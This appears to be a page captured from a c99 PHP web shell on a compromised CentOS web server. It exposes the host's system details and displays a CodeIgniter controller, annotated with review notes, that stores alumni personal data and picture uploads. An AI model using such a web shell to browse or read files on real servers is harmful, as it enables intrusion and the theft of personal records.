!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)


Viewing file:     ealumni.php (10 KB)      -rwxr-xr-x
<?php
include('ea_controller.php');
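/**
 * Controller for adding alumni records (input form and save handler).
 *
 * NOTE(review): no login or authorization check is visible in this class;
 * presumably Ea_controller enforces it. Confirm, because ea_save() writes
 * personal data (citizen ID, addresses, phone numbers) and files to disk.
 */
class Ealumni extends Ea_controller {

    // ##### start add ealumni

    /**
     * Show the "add alumni" form.
     *
     * Loads the prefix, nation and religion option lists into
     * $this->contents and renders the v_addAlumni view with the flash
     * message left by the previous ea_save() call.
     */
    function ea_input() {
        $ppcFolder = $this->config->item('ppc_folder');

        $this->load->model($ppcFolder.'mo_prefix', 'pf');
        $this->load->model($ppcFolder.'mo_nation', 'nt');
        $this->load->model($ppcFolder.'mo_religion', 'rlg');

        $this->contents['rs_pf'] = $this->pf->get_options();
        $this->contents['rs_nt'] = $this->nt->get_options();
        $this->contents['rs_rlg'] = $this->rlg->get_options();

        $this->output($this->config->item("ea_folder")."v_addAlumni", $this->session->flashdata('msg'));
    }

    /**
     * Validate the posted form, store the optional student picture and
     * insert the alumni main and bio records, then redirect to the form.
     *
     * Flash message 'msg' is 1 when the inserts were committed and 2 when
     * they were rolled back. When validation fails the form is shown again.
     */
    function ea_save() {
        $this->load->library('form_validation');
        $this->form_validation->set_error_delimiters('<div class="error">', '</div>');

        // field, label, rules: applied in this order.
        // xss_clean filters input only; views must still escape these values
        // on output.
        $rules = array(
            array('studentCode', 'รหัสนักศึกษา', 'trim|required|integer|xss_clean'),
            array('citizenId', 'เลขที่บัตรประจำตัวประชาชน', 'trim|integer|xss_clean'),
            array('pfName', 'คำนำหน้าชื่อ', 'trim|required|xss_clean'),
            array('pfNameE', 'คำนำหน้าชื่อ', 'trim|required|xss_clean'),
            array('studentName', 'ชื่อ (ไทย)', 'trim|required|xss_clean'),
            array('studentSurname', 'นามสกุล (ไทย)', 'trim|required|xss_clean'),
            array('studentNameEng', 'ชื่อ (อังกฤษ)', 'trim|xss_clean'),
            array('studentSurnameEng', 'นามสกุล (อังกฤษ)', 'trim|xss_clean'),
            array('oldPfName', 'คำนำหน้าชื่อ', 'trim|xss_clean'),
            array('oldfName', 'ชื่อ (เดิม)', 'trim|xss_clean'),
            array('oldlName', 'นามสกุล (เดิม)', 'trim|xss_clean'),
            array('studentSex', 'เพศ', 'trim|xss_clean'),
            array('bloodGroup', 'หมู่เลือด', 'trim|xss_clean'),
            array('nationId', 'สัญชาติ', 'trim|xss_clean'),
            array('religionId', 'ศาสนา', 'trim|xss_clean'),
            array('birthDate', 'วันเกิด', 'trim|xss_clean'),
            array('admitAcadYear', 'ปีที่เข้าศึกษา', 'trim|required|xss_clean'),
            array('graduateYear', 'ปีที่จบการศึกษา', 'trim|required|xss_clean'),
            array('programId', 'หลักสูตร', 'trim|required|xss_clean'),
            array('genNo', 'รุ่นที่', 'trim|xss_clean'),
            array('studentEmail', 'อีเมล์', 'valid_email'),
            array('sdtPicturePath', 'รูป', 'trim|xss_clean'),
            array('homeAddress', 'ที่อยู่ (ตามภูมิลำเนา)', 'trim|xss_clean'),
            array('districtName', 'ตำบล', 'trim|xss_clean'),
            array('amphurName', 'อำเภอ', 'trim|xss_clean'),
            array('provinceName', 'จังหวัด', 'trim|xss_clean'),
            array('homeZipcode', 'รหัสไปรษณีย์', 'trim|xss_clean'),
            array('homePhoneNo', 'โทรศัพท์', 'trim|xss_clean'),
            array('currentAddress', 'ที่อยู (ปัจจุบัน)่', 'trim|xss_clean'),
            array('curDistrictName', 'ตำบล', 'trim|xss_clean'),
            array('curAmphurName', 'อำเภอ', 'trim|xss_clean'),
            array('curProvinceName', 'จังหวัด', 'trim|xss_clean'),
            array('currentZipcode', 'รหัสไปรษณีย์', 'trim|xss_clean'),
            array('currentPhoneNo', 'โทรศัพท์', 'trim|xss_clean'),
            array('officeAddress', 'ที่อยู (ที่ทำงาน)่', 'trim|xss_clean'),
            array('offDistrictName', 'ตำบล', 'trim|xss_clean'),
            array('offAmphurName', 'อำเภอ', 'trim|xss_clean'),
            array('offProvinceName', 'จังหวัด', 'trim|xss_clean'),
            array('officeZipcode', 'รหัสไปรษณีย์', 'trim|xss_clean'),
            array('officePhoneNo', 'โทรศัพท์', 'trim|xss_clean'),
        );
        foreach ($rules as $rule) {
            $this->form_validation->set_rules($rule[0], $rule[1], $rule[2]);
        }
        // NOTE(review): pfId, oldPfId and the district/amphur/province ids
        // stored below have no validation rule. Whether the models escape
        // them is not visible here; confirm before trusting them in SQL.

        if ($this->form_validation->run() != true) {
            $this->ea_input();
            return;
        }

        // studentCode has passed the "integer" rule above, which is what
        // makes it acceptable as a file-name component below. Do not reuse
        // this pattern with a field that lacks such a rule.
        $pictureDir = $this->config->item('ea_upload_pictureStd');
        $studentCode = $this->input->post('studentCode');

        // NOTE(review): allowed_types is an extension/MIME allow-list only.
        // The upload directory should be configured so the web server never
        // executes scripts from it.
        $config['upload_path'] = $pictureDir;
        $config['allowed_types'] = 'jpg';
        $config['max_width'] = $this->config->item('ea_allowed_width');
        $config['max_height'] = $this->config->item('ea_allowed_height');
        $config['max_size'] = $this->config->item('ea_upload_size');
        $this->load->library('upload');

        // Only the picture field is handled. Looping over every entry in
        // $_FILES would store any extra file field under the student's
        // picture name.
        if (isset($_FILES['sdtPicturePath']) && $_FILES['sdtPicturePath']['name'] != "") {
            $currentPicture = $pictureDir.$studentCode.".jpg";
            $backupPicture = $pictureDir.$studentCode."_old.jpg";

            // Move the existing picture aside so a failed upload can restore it.
            if (file_exists($currentPicture)) {
                rename($currentPicture, $backupPicture);
            }

            $config['file_name'] = $studentCode;
            $this->upload->initialize($config);

            if ($this->upload->do_upload('sdtPicturePath')) {
                if (file_exists($backupPicture)) {
                    unlink($backupPicture);
                }

                $uploaded = $this->upload->data();
                // Not stored yet: picturePath is still hard-coded below.
                $picturePath = $uploaded['file_path'].$uploaded['file_name'];
            } else {
                if (file_exists($backupPicture)) {
                    rename($backupPicture, $currentPicture);
                }

                $error = array('error' => $this->upload->display_errors());
                // NOTE(review): validation has already run, so this rule is
                // presumably never evaluated and the record is saved without
                // the picture. callback_checkupload is not defined in this
                // class. Confirm the intended behaviour.
                $this->form_validation->set_rules('sdtPicturePath', trim($error['error']), 'callback_checkupload');
            }
        }

        // Start the transaction explicitly: without it the rollback below
        // cannot undo the first insert when the second one fails.
        // (Assumes both models write through $this->db; TODO confirm.)
        $this->db->trans_begin();

        $this->load->model($this->config->item('ea_folder').'mo_alumnimain', 'am');
        $this->am->alumniId = '';
        // model property => posted field
        $mainFields = array(
            'studentCode' => 'studentCode',
            'citizenId' => 'citizenId',
            'prefixId' => 'pfId',
            'studentName' => 'studentName',
            'studentSurname' => 'studentSurname',
            'studentNameEng' => 'studentNameEng',
            'studentSurnameEng' => 'studentSurnameEng',
            'admitAcadYear' => 'admitAcadYear',
            'graduateYear' => 'graduateYear',
            'programId' => 'programId',
            'genNo' => 'genNo',
            'studentEmail' => 'studentEmail',
        );
        foreach ($mainFields as $property => $field) {
            $this->am->$property = $this->input->post($field);
        }
        $this->am->updateDateTime = date('Y-m-d');
        $this->am->updateUserId = $this->session->userdata("UsName");
        $this->am->studentStatus = "4";
        $this->am->insert();

        $this->load->model($this->config->item('ea_folder').'mo_alumnibio', 'ab');
        $this->ab->alumniId = $this->am->last_insert_id();
        // model property => posted field
        $bioFields = array(
            'oldPrefixId' => 'oldPfId',
            'oldfName' => 'oldfName',
            'oldlName' => 'oldlName',
            'studentSex' => 'studentSex',
            'bloodGroup' => 'bloodGroup',
            'nationId' => 'nationId',
            'religionId' => 'religionId',
            'birthDate' => 'birthDate',
            'homeAddress' => 'homeAddress',
            'homeDistrictId' => 'districtId',
            'homeAmphurId' => 'amphurId',
            'homeProvinceId' => 'provinceId',
            'homeZipcode' => 'homeZipcode',
            'homePhoneNo' => 'homePhoneNo',
            'currentAddress' => 'currentAddress',
            'currentDistrictId' => 'curDistrictId',
            'currentAmphurId' => 'curAmphurId',
            'currentProvinceId' => 'curProvinceId',
            'currentZipcode' => 'currentZipcode',
            'currentPhoneNo' => 'currentPhoneNo',
        );
        foreach ($bioFields as $property => $field) {
            $this->ab->$property = $this->input->post($field);
        }

        // NOTE(review): the office* inputs overwrite the current* properties
        // set just above, so the current address is never stored. This looks
        // like a copy-paste slip. The office property names of mo_alumnibio
        // are not visible here, so the assignments are kept as they were.
        $this->ab->currentAddress = $this->input->post('officeAddress');
        $this->ab->currentDistrictId = $this->input->post('offDistrictId');
        $this->ab->currentAmphurId = $this->input->post('offAmphurId');
        $this->ab->currentProvinceId = $this->input->post('offProvinceId');
        $this->ab->currentZipcode = $this->input->post('officeZipcode');
        $this->ab->currentPhoneNo = $this->input->post('officePhoneNo');

        $this->ab->picturePath = 'photo.jpg';//$picturePath;
        $this->ab->insert();

        // The debugging echo of the new id and of last_query() was removed:
        // it printed the SQL, including personal data, into the response and
        // sent output ahead of the redirect below.

        if ($this->db->trans_status() === false) {
            $this->db->trans_rollback();
            $this->session->set_flashdata('msg', 2);
        } else {
            $this->db->trans_commit();
            $this->session->set_flashdata('msg', 1);
        }

        redirect($this->config->item("ea_folder")."ealumni/ea_input");
    }
}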
?>


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0104 ]--